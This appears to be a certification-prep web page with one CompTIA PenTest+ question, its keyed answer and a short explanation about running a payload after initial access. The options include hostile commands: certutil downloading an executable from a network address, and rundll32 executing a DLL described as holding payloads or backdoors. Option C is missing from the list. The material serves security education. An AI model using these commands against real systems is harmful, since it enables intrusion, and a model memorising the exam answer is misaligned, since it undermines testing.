CompTIACompTIA
PT0-003 · Question #18
PT0-003 Question #18: Real Exam Question with Answer & Explanation
The correct answer is D: rundll32.exe c:\path\foo.dll,functName. rundll32.exe is commonly used by penetration testers to execute functions exported from DLL files, which can contain payloads or backdoors, making it suitable for post-exploitation access.
Submitted by cyberguy42· Mar 6, 2026Attacks and Exploits
Question
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
Options
- Apowershell.exe impo C:\tools\foo.ps1
- Bcertutil.exe -f https://192.168.0.1/foo.exe bad.exe
- Drundll32.exe c:\path\foo.dll,functName
Explanation
rundll32.exe is commonly used by penetration testers to execute functions exported from DLL files, which can contain payloads or backdoors, making it suitable for post-exploitation access.
Topics
#payload execution#initial access#Windows commands#persistence
Community Discussion
No community discussion yet for this question.